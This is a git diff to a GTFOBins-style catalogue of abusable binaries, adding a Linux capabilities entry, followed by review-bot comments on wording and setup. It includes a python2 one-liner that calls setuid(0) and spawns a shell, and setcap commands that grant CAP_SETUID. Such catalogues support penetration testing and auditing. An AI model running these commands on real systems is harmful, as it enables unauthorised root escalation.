diff --git a/_data/functions.yml b/_data/functions.yml
index f9b662f..adc13a1 100644
--- a/_data/functions.yml
+++ b/_data/functions.yml
@@ -62,6 +62,13 @@ load-library:
 It loads shared libraries that may be used to run code in the binary
 execution context.
 
+capabilities-enabled:
+ label: Capabilities
+ description: |
+ It can manipulate its process UID and in Linux systems it can be set with the
+ `CAP_SETUID` capability to make it work as a backdoor to maintain elevated privileges.
+ This also works if the binary is invoked by another binary with the capability set.
+
 suid-enabled:
 label: SUID
 description: |
diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md
index d82049c..5f6e73a 100644
--- a/_gtfobins/python2.md
+++ b/_gtfobins/python2.md
@@ -30,6 +30,8 @@ functions:
 - code: python2 -c 'open("file_to_read").read()'
 load-library:
 - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
+ capabilities-enabled:
+ - code: ./python2 -c 'import os; os.setuid(0); os.system("/bin/sh")'
 suid-enabled:
 - code: ./python2 -c 'import os; os.system("/bin/sh -p")'
 sudo-enabled:
diff --git a/_layouts/bin.html b/_layouts/bin.html
index 47e5e30..19b6039 100644
--- a/_layouts/bin.html
+++ b/_layouts/bin.html
@@ -30,6 +30,10 @@ layout: common
 cp $(which {{ bin_name }}) .
 sudo sh -c 'chown 0 ./{{ bin_name }}; chmod +s ./{{ bin_name }}'
 {% endif %}
+{%- if function_name == 'capabilities-enabled' %}
+cp $(which {{ bin_name }}) .
+sudo setcap cap_setuid+ep {{ bin_name }}
+{% endif %}
 {{ example.code }}
 {% endcapture %}
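Review bot: The closing sentence of the new `capabilities-enabled` description, `This also works if the binary is invoked by another binary with the capability set.`, overstates how file capabilities propagate: on Linux a child process does not gain a capability merely because its parent holds it, but from its own file capabilities or from what the parent passes on through its inheritable or ambient set, so the sentence should be narrowed, e.g. `This may also apply when it is invoked by a process that passes the capability on through its inheritable or ambient set.` The first sentence also reads awkwardly ("It can manipulate its process UID and in Linux systems it can be set with the..."); `It can manipulate its process UID and, on Linux, can be granted the CAP_SETUID file capability, which makes it work as a backdoor to maintain elevated privileges.` keeps the meaning. If the site's descriptions carry such pointers, a one-line mention of the audit check that reveals binaries left with file capabilities (`getcap -r / 2>/dev/null`) would make the entry useful on the defensive side as well. The rest of the functions mapping lies outside the hunk.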
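Review bot: The new `capabilities-enabled` example carries only `code:` and states no precondition, so a reader cannot tell from the entry that it only succeeds when the copied `./python2` binary has the capability in its effective set (the `cap_setuid+ep` that the layout applies); if the site's example schema allows a `description:` next to `code:`, add one such as `description: Requires the binary to have the CAP_SETUID capability in its effective set (see the setup commands above).` The enclosing `functions:` mapping starts before and continues after the hunk.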
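Review bot: `sudo setcap cap_setuid+ep {{ bin_name }}` on the new side omits the `./` prefix that the neighbouring `suid-enabled` block and the examples use (`./{{ bin_name }}`); setcap treats its argument as a path, so it does operate on the copy in the working directory, but the inconsistency invites a later edit that assumes a PATH-style lookup, and `sudo setcap cap_setuid+ep ./{{ bin_name }}` keeps the two setup blocks parallel. The setup also leaves a capability-bearing copy behind once the demonstration is over; since the snippet is presented as lab setup, a comment in the rendered block pointing at the cleanup, such as `# remove afterwards: sudo setcap -r ./{{ bin_name }}`, would be worth adding. The `{%- if` whitespace trim presumably mirrors the existing `suid-enabled` block, whose opening tag is outside the hunk, as is the start of the capture block.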